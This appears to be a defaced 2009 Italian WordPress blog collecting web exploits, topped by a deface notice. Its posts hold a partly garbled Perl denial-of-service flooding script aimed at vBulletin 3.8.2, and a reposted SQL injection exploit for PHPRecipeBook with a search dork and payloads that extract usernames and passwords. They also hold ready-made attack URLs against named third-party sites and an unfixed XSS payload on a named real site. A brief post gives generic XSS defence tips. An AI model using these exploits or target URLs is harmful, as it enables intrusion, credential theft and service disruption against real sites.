pWnt By Securityspl0its-Forums

pWnt By l3d & BlAcK HaT – Securityspl0its-Forums Community

luglio 30, 2009

null

Heila nj3ctor il tuo lamero blog è stato appena defacciato

Motivi: rips e altro

pWnt By l3d & BlAcK HaT – Securityspl0its-Forums

http://anonymousite.altervista.org/board/index.php

Etichette: black hat, deface, l3d, securityspl0its-forums
Pubblicato in Uncategorized | Lascia un commento »

* vBulletin® Version 3.8.2 Denial of Service Exploit

luglio 10, 2009

######################################
if (@ARGVvBulletin® Version 3.8.2);
chomp($ziel =);
if ($ziel eq”"){
die “$fehler\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Path->);
chomp($path =);
if ($path eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print “Verwundbarkeit\n”;
print”forumdisplay.php?f=\n”;
print”->”n;
chomp($vul =);
if ($vul eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Time->);
chomp($flood =);
if ($flood eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Port->);
chomp($port =);
if ($port eq “”){
die “$fehler \n”;}
print”$block\n”;
print q(Send “start”->);
chomp($start =);
if ($start eq “”) {
die “$fehler\n”;}
print “$block\a\n”;
print “[+]Konntroliere Daten \n”;
print “[*]Kontroliere Ziel : $ziel\n”;
print “[*]Kontroliere Board : $path\n”;
print “[*]Kontroliere Port : $port\n”;
print “$block\n”;
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = “$ziel”.”$path”.”$vul”;
$lrg = length $postit;
$sock = new IO::Socket::INET (
PeerAddr => “$ziel”,
PeerPort => “$port”,
Proto => “tcp”,
);

print $sock “POST $path$vul HTTP/1.1\n”;
print $sock “Host: $ziel\n”;
print $sock “Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n”;
print $sock “Referer: $ziel\n”;
print $sock “Accept-Language: en-us\n”;
print $sock “Content-Type: application/x-www-form-urlencoded\n”;
print $sock “User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n”;
print $sock “Content-Length: $lrg\n\n”;
print $sock “$postit\n”;
close($sock);
syswrite STDOUT, “->BLACKOUT<-";
$x++;
}
}else{
die "Fehler kann nicht zum Ziel verbinden $ziel !\n";
}

Etichette: exploits, vBulletin
Pubblicato in spl0itz, Webappsec | Lascia un commento »

PHPRecipeBook

luglio 6, 2009

Download PHPRecipeBook: http://phprecipebook.sourceforge.net/

spl0itz: http://www.milw0rm.com/exploits/8330

//////////////////////////////////////////////////////////////////////
////////////////////////////1923TURK – GRUP///////////////////////////
//////////////////////////////////////////////////////////////////////
*****************************************************
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download : http://sourceforge.net/projects/phprecipebook/

[-] Bugs : Remote SQL injection Exploit
[-] Dork : inurl:”/index.php?m=” “PHPRecipeBook 2.39″
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[-] Contact : darkdewil@1923turk.biz

[!] Note : Always use the time you have to finish your work.
Never leave it to the last minute.
Once time goes away, it never comes back

*****************************************************
//////////////////////////////////////////////////////////////////////
*****************************************************
[-- Bugs --]

(+)

/index.php?m=recipes&a=search&search=yes&course_id=[SQLEXP]

[-- SQL EXPLOIT --]

Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users–
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users–

# milw0rm.com [2009-03-31]

Ecco due siti vulnerabili:
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)

http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (password utenti)
—
http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)

http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+security_users– (password utenti)

Etichette: exploits, PHPRecipeBook, SQLi, wepappsec
Pubblicato in Security Web, spl0itz, Webappsec | Lascia un commento »

Difendersi dalle XSS (solo info)

luglio 5, 2009

In questo articolo mi limiterò a far capire ai webmaster e agli utenti di un sito come difendersi dalle XSS.

Per quanto riguarda gli sviluppatori dovranno controllare ogni informazione inserita in input dagli utenti prima di inoltrarla alle proprie applicazioni.

Per quanto riguarda gli utenti non dovranno fare altro che tenere aggiornati i loro browser poiché oramai ognuno di essi ha il blocco di script in JavaScript, VBScript e ActiVix.

(Info su come proteggersi dalle XSS)

Etichette: difesa, XSS
Pubblicato in Security Web, XSS (Defense) | Lascia un commento »

CHECK B.O. The Computer Guardian XSSed!

luglio 5, 2009

Sito XSSed:
trojan.it

XSS:
http://www.trojan.it/index2.asp?lng=%22%3E%3Cscript%3Ealert%28%22nj3ctor%22%29;%3C/script%3E

Autore:
nj3ctor

Status:
UNFIXED

Etichette: nj3ctor, trojan.it, XSS
Pubblicato in XSS (Attacks) | Lascia un commento »

Hello world!

luglio 4, 2009

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!

Pubblicato in Uncategorized | 1 Commento »

pWnt By Securityspl0its-Forums

pWnt By l3d & BlAcK HaT – Securityspl0its-Forums Community

* vBulletin® Version 3.8.2 Denial of Service Exploit

PHPRecipeBook

Difendersi dalle XSS (solo info)

CHECK B.O. The Computer Guardian XSSed!

Hello world!

Pagine

Archivi

Categorie

Blogroll

Meta

Follow “pWnt By Securityspl0its-Forums”